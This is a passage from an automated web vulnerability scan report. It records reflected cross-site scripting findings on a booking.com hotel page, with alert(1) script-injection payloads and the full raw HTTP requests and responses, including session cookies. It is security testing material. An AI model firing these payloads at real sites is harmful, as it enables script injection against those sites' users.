html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16175d4"><script>alert(1)</script>4d50fc21cb9&checkout_year_month=2011-10&lang=en">
...[SNIP]...
4.176. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkout_year_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4451b"><script>alert(1)</script>1469f7d8f2b was submitted in the checkout_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-104451b"><script>alert(1)</script>1469f7d8f2b&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:15:45 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74m327rSMm5c9JJEUOw2zQiSbjMQslasKIWsdewz%2F0VtJrj6umhESuXzc0fkjQalnYW%2BjCxtcNs59JoWNTzpFVjz%2FO20YOLaoB703xAwP1zWMK0CNvhJZNpVSG4HrTIjcdVh%2FVa4LPdb%2BGyY4nSbjX5jW5rBCg78zAEetjQZ4UOIAgCE5n%2BDv92KF%2BJCvkqQ%2B7%2BiGHrkwXbwtRCS9lNDjP7BoqaO8u2o6V5ZFmo0H%2FD%2FS1qmzc3TVFrpVnob4rDJgGRvHbyDTrrfT4RV6CkN4PNr7iNPesDaWZ0pVK5mmwk1ImMgg0KQaCebITwpRVYoSalCV7jD7dx9pFpn0xt%2Bw5CYChu3JwAegqla6CbCf61LGT98GDff8OcNH6RaNd8Le%2Bhso%2FU5jPb39RBsMdLGFQOqXKwQ4TVNalCGa9JoFX9WdRJbeljh4C3cynu6pQb9DdhOYuua82gpUbrcpRwo5rI8rQ49cyMEdWwFIlurabxIbeuklyNdt6jYh8mU0avk7pZ8uFxzXejbHq3BbZy%2FxspMAp%2B2r%2FGAUjYyDurcS8ccrvCrIRNi4HErQjA58dLfjM30eysHjuFzVA5FxD85sIROQppsB7j2di9syHmNRAWJQie91qdfUW9xUBfGVEP1KfI6WWn%2F%2FJdVwT91UfljBNuN%2BY0ihMzgT0jYkK478QcYMZ%2BeIZvw4lnjxtPFqh1HrfHy9TRgIko5Ua990t%2B337r8RiAFAPHv1rfWa6SOVf%2BDwaxP8KYvkwQzm3iFSg3Maw%2B%2FaqzDdYxngHLGBAfMeiHWoPUeI2lHeQGZXdV08x7raNeKKC0QQxqfXt%2FI7svqJt7zxRUxyz6q9bequriy3pw%2F%2BRQlQNzShRSKwgzh4ZQP4YyCJaJ9IZHZksFpsDiJOvnytyy9Lhq%2FvSK2E%2FYZlgedG2997tY7EuIZIQHJz3IC4lDT%2Bob0uL21JyBkO%2FNDBDShylEJIyuWGurPbSlDqmLU6gnPi0gSKNZOXm6sNPPRsEm6%2FQ0hBR6uSgKlhxh5om1iRXsM7KHDcy0C6wvgl8wZUHMep6Xr0S8%2BsKl%2BaIckC76fdgDYWfSyvGkdYs0IlCRLvgILydb5vnRAVaMsKaOo3pyEsu3%2FpAV2dpYIzrz8SeraD4f8m7VGrXS8HmoyCii6SpE%2FIMkF6XDrlnZw%2FuXOcW9vL2EHduQgsd%2Bt1MvN7zX7VOhSJvzQL5aBnhMR5zzbcGwi30YT5kH69oHfvXs4Idl%2BD1kD9K%2FHn82%2FXBAmVMV9ZjV%2BAyTF%2Bnt2ndsUDSi6OpqA3al3B6bcpRUJQOaJI%2FCfUN%2BUNxiyjd1W8quF3oRQIsAt30Vod5B8vKaiuagqZEuXKM3xGtixpsv3eTlCA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:15:45 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 224043
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-104451b"><script>alert(1)</script>1469f7d8f2b&lang=en">
...[SNIP]...
4.177. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkout_year_month request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8903c</script><script>alert(1)</script>c0693d7ea4 was submitted in the checkout_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-108903c</script><script>alert(1)</script>c0693d7ea4&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:16:10 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGbFMKGxhLGxcV8JgVcsNPdwFrYE9stqnMmO6fnezme%2FSKovCgD%2FmghVroj8%2Fv94KVF6nxVdJXxbxsoyyUKiMxk%2BHqWhhgecDSoZbfT3IgB%2Bys5JhVUx09wv%2FCvqgNFA3NTgOGzPpI21kul0Km944LAkGjdCk98wlfQJBQIMubVfwwTOiRjuhNTdmO3Arzv5TP%2B554VEudje40Z8cfyqZ06Lc4QvCHW5ttNGQ%2BIad7noRujQlQVCKhyWKOE6Eo1n3N6aR6certxqGl38fEJzkQPbYn1qGOItUUm%2FOYEMIq%2FyMr4VDvz%2Be4RfapT9%2Bez%2BNVYQ%2Bdlv87DkdXvN%2BbnMOdMzpEXWhAH9qNjlZ71rvXXvJrfbGJg8Kro8dJq9Bx22pxeX5puEOANM7mDjSVTGQfv6cZg2iJpy66pGhA4c1tnsFtS1oVGn3Z%2BFIBA01R3VhaI60xAxg587Tf%2BBN0Nb832D9CwPqiPsrDAjr01J8Lhew%2FvLEiX9GCG9tszA3SXlesk3QQeA6gN2xThCdpUEcKKpn9wBASP6irw%2Bm0CcMtCp%2BZK%2FdgOEG%2Bq1vrdS2h2GMq9rTCdVsS6VpM8frDZq6fwhbw68G6LavMuIKDc6STqUtTh91C6oovmRh%2Fvgz6VpegApFBpvWwg7hyJohSQPigg1eoBT9awgqDlxbXiOf3pO9FGTVbsXbOp9fHXdgqbXpiu6rkEYMvK4%2FH5EpYBbC9NQjADPtg84ePxV5JFOlABqQbM37dsyNq5Xeif5YUQEOJplrOfb4QMvNShvWBMqrymM0f42gK4RHlnEXNz8n4dCp2yPQJuqtJ9nj36s2hlfkqQ2127YunPFfVi3HMuHp3FRc3%2BNrwCZY%2BuDZbufxU7RAdqv47PNvHl25xb5IockAUmOF6uKctTXqYlSF1e74jyXFHia3dnn0Yt1r4xpbzP0gUMzwLRLqeMa1zSAPcGd77V%2Fm%2FRHzqwrJlbtr8Lqa5qNAbFkjgEmAWECF2YkQoishg3MJU%2B7tKcnXZ5CTMDwihNISVs%2F090qrz5nEUpn7ZkSq3iBqehiPbb8JGNTTeWtyiswipidbaKe6duKMpPlEnOOYSmoDPCPi0YEk%2B8Ydfml21N2f8PreRCrc%2BsCHlbedGR3Z2%2FNGSYhSDLBMOMGfpoIulF5PqkbPQKVexT1vdLmDx2fCKO4edo%2BtM%2BjMoDqOhmBITSxn6Q5DDhgVguSFDglk626voZ3Ejad4HA3APyYB9l9ZXMT0HKjZIy%2FHuNxyIj8wx4FXAA5WqZgUtbs6sdOEIqG51PYBRwFjWWr71s%2BvqKea35FZiybbjAhhaYCdJlRN%2BoAoGnB59mhpDFRfr%2BdlJGrsmZgSPQ4fBdeFzMw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:11 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 224062
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-108903c</script><script>alert(1)</script>c0693d7ea4&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin_monthday=14;checkin_year_month=2011-10;checkout_monthday
...[SNIP]...
4.178. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the do_availability_check request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dafb4"><script>alert(1)</script>c6316da2516 was submitted in the do_availability_check parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=ondafb4"><script>alert(1)</script>c6316da2516&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:35 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIswHTSe13ijTp3EbixcL7lLKWRxAbVo9ABtd8t9Co%2FpH5JfBUJX0Zs9A69Ugv%2F4dXTroIXDYelVqebWVX1f4AB%2FyOZT2AnYch8bkyfhNGHuvAjyF%2BSfsyGhCrlXdpWmxLTzsxYpNz0LKsmBeUuR7MSHIOoekmE37%2B897C14i3%2BE2LT9%2FsDZf7FxCBI43nk%2B5nLfyboof8eK1ZefCCt3oRzOiZuQoHxAToVWD1hJ82PS2pvUIhsvDTM2q6aBfTaYzC03Ky3TWQyriguA2q3kUWjMDnLK3EsF7d8dVrC%2ByTCT8pcUuCFTZLJLuRBJ5sbxBvyClKKm7lnN4t5yovnlQeddS%2FD5mk5%2FcfJb9IBtZa3BfA8d537Jkr1%2BfXGL5smeYsAGrJhmQ8pjgrhDtYEJcJU05ng0KApGigNRQo21F0mWW1eQBudwgy30%2F0RnLegpPa5tktv7OiTnA519ClGebiTafGdDf%2FoB6kTL%2FUzFsHds%2FQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:35 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232245
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
go_back_url=http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=ondafb4"><script>alert(1)</script>c6316da2516&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en">
...[SNIP]...
4.179. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the do_availability_check request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d12ee</script><script>alert(1)</script>d8fe18de66e was submitted in the do_availability_check parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=ond12ee</script><script>alert(1)</script>d8fe18de66e&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoN